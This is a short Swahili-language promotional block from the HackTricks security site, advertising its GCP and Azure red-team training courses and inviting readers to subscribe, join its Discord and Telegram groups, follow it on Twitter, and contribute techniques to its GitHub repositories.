Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.